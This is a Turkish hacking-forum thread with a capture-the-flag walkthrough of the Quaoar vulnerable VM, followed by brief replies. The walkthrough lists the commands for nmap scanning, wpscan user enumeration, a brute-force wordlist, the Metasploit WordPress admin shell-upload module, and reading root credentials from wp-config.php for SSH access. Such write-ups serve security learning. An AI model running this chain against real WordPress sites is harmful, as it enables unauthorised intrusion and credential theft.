THT DUYURU

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm

Seçenekler

Quaoar :Açıklı Makine Çözümü /-The Hacker

'Creative - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
03/2017
Mesajlar:
3.150
Konular:
94
Teşekkür (Etti):
224
Teşekkür (Aldı):
1064
Ticaret:
(0) %
10-02-2019 09:19
#1
Quaoar :Açıklı Makine Çözümü /-The Hacker


Merhaba Arkadaşlar Bu Konuda "Quaoar VM" Açıklı Makinesinin Nasıl Çözüldüğünü Anlatıcam. Ctf Alanında İlerlemek İstiyor İseniz Yada Daha Yeni Başladıysanız Bu Konu Tam Sizler İçin Çünkü Makine Açıklamasında Bile ;



Yazmakta Ki Bencede Öyle Bu Konunun Açılma Sebebi Temel Olarak Forumdaki Yeni Başlamış Hevesli Kitleye Hitap Etmek. CTF Hakkında Daha Detaylı Bilgiye Şu Rehber Konudan Ulaşabilirsiniz.

Bölümü Güncel Olarak Takip Ederek Kendinizi Geliştirebilirsiniz. Konuya Geçelim.

Kod:
Hedef ;  Bu makinede 3 tane bayrak vardır 1. Bir kabuk alın 2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var (Gugıl İle Çevirdim Çeviri Ne Kadar Doğru Bilemem.)

Şimdi İse Çözüme Geçelim.



İlk Olarak Hedef Makinemizim İp Adresini Bulmak İçin "netdiscover" Aracını Çalıştıralım.




Hedef İp Adresini Öğrendiğimize Göre Nmap Taraması Yaparak Açık Portları Görelim.


Kod:
nmap -A -T4 192.168.1.13


Nmap Tarama Sonuçlarını İncelediyseniz Eğer Dikkatinizi Benim Gibi Robots.txt Dosyası Çekmiştir. İncelemek Üzere Curl Aracını Çalıştırıyorum.


Kod:
curl 192.168.1.13/robots.txt


Beni "/wordpress" Uzantısına Yönlendiriyor Girdiğimde İse Hiçbirşey Bulamadım Buda Beni Otomatik Olarak "/wordpress/wp-login.php" Yönlendirdi .


Login Ekranında Pek Fazla Birşey Yapamayacağım İçin "wpscan" Aracını Kullanarak Sistemdeki Açıkları ve Username'leri Bulacağız.
Kullanacağım Komut ;


Kod:
wpscan --url http://192.168.1.13/wordpress/ --enumerate u

Sonuç Olarak Bana 2 Tane Username Verdi Bende Bunları Burpsuite Üzerindne Kaba Kuvvet Saldırısında Kullanıcam.
(Burpsuite İşin Tamamen Can Sıkıntısından Kullanıldı Ki Diğer Kolay Yollarlada Şifreyi Bulabilirsiniz. Misal Hydra İlede Deneyebilirsiniz. )





Kullandığım Wordlist İse ;
Username

Kod:
admin
wpuser
Password

Kod:
password
administrator
admin
wpuser
wordpress
wpadministrator



Bu Şekilde de Sitenin Admin Giriş Bilgilerini Kaba Kuvvet Saldırısı İle Bulduk.


Kod:
admin:admin
(Anlatım Zaten Forumda Olduğu İçin Yeniden Yazma Gereği Duymadım Şu Konuda Bulabilirsiniz;https://www.turkhackteam.org/siber-g...am_hacker.html )


Şimdi İse İlk Görevi Yapalım O Zaman. "1. Bir kabuk alın" Sisteme Shell Upload Edicez Kullanıcağımız Modül


Kod:
use exploit/unix/webapp/wp_admin_shell_upload
Gerekli Bilgileri Girelim.


Kod:
set PASSWORD admin
 set USERNAME admin
set RHOST 192.168.1.13
set TARGETURI /wordpress/
run


Meterpreter Shell'imizi Aldığımızı Göre Diğer Görevler Yani "2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var "
Bundan Sonra İse pwd ile hangi dizinde olduğumuzu öğrenip Bayrağımızı arıyoruz.




İlk Bayrağımızı Yakalamış Olduk. Kodlar;

Kod:
cd /home
cd wpadmin
ls
cat flag.txt
Sıra İkinci Bayrakta Bunun İçinde Artık /home Dizininden Çıkmak Gerekli


Kod:
cd /
Komutu ile çıkıp "ls" Komutu İle Bulunduğumuz Dizini Listeliyoruz. Dizinlerde Gezerken Yapılandırma Dosyasını Gördüm Ve Düşündüğüm Gibi;

Kod:
cd /var
ls
cd www
ls
cd wordpress
ls
cat wp-config.php
Ve Ssh Bağlantı Bilgilerimizide Almış Olduk.




Kod:
root
rootpassword!

Bağlantıyı Kurup .


Bayrağımızı Yakalayalım.
Tek Girmeniz Gereken Kod'lar


Kod:
ls 
more flag.txt
Ve 2.ci Bayrağımızıda Bulduk.




Konu Buraya Kadardı Ayrıca Bendende Buraya Kadardı 20 Saat Civarı Uyumuyordum Uykuyu Hakettiğimi Düşünüyorum Size İyi Okumalar Banada İyi Uykular
--------------------- ‘’ Ve Orhan Veli Ceketsiz Öldü.’’


Konu THE HACKER 21 tarafından (10-02-2019 17:49 Saat 17:49 ) değiştirilmiştir.
TURKISH STARS - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2018
Mesajlar:
1.056
Konular:
17
Teşekkür (Etti):
641
Teşekkür (Aldı):
214
Ticaret:
(0) %
10-02-2019 09:29
#2
Gerçekten uğraşılmış bir konu. İyi uykular hocam
---------------------
Senin bölgen senin meselendir. Diğerleri senin bölgende ana saygı göstermelidirler. Kimse senin bölgende sana karşı gelemez.
'Creative - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
03/2017
Mesajlar:
3.150
Konular:
94
Teşekkür (Etti):
224
Teşekkür (Aldı):
1064
Ticaret:
(0) %
11-02-2019 06:43
#3
Alıntı:
TURKISH STARS´isimli üyeden Alıntı Mesajı göster
Gerçekten uğraşılmış bir konu. İyi uykular hocam
Teşekkürler .
--------------------- ‘’ Ve Orhan Veli Ceketsiz Öldü.’’


Daedalus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2015
Mesajlar:
215
Konular:
19
Teşekkür (Etti):
43
Teşekkür (Aldı):
17
Ticaret:
(0) %
11-02-2019 08:37
#4
Oncelikle konu icin teşekkürler bu sekilde egitim amacli kullanabilecegimiz baska isolar varmi acaba , birde bu serinin devami gelecek mi?
--------------------- if (dev.isBored() || job.sucks()) {
searchJobs({flexibleHours: True, companyCulture: 100});

}
'Creative - ait Kullanıcı Resmi (Avatar)
Green Team
Üyelik tarihi:
03/2017
Mesajlar:
3.150
Konular:
94
Teşekkür (Etti):
224
Teşekkür (Aldı):
1064
Ticaret:
(0) %
11-02-2019 08:47
#5
Alıntı:
Daedalus´isimli üyeden Alıntı Mesajı göster
Oncelikle konu icin teşekkürler bu sekilde egitim amacli kullanabilecegimiz baska isolar varmi acaba , birde bu serinin devami gelecek mi?
Elbette https://www.vulnhub.com/ Sitesinden Kendi Bilginizi Test Amaçlı ve Kendinizi Geliştirmek İçin Diğer Makinelere Ulaşabilirsiniz. Rehber Konuyuda Okuyarak Zafiyetli Makineler Hakkında Diğer Bilgilere Ve Paylaşılan Platformlara Bakabilirsin.
https://www.turkhackteam.org/capture...m-rehberi.html
İkinci Soru İçinde https://www.turkhackteam.org/capture-flag/ Bölümünü Güncel Olarak Takip Ederseniz Zaten Bu Gibi Konuların Geldiğini Ve Geleceğinide Görürsünüz
.
--------------------- ‘’ Ve Orhan Veli Ceketsiz Öldü.’’



Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler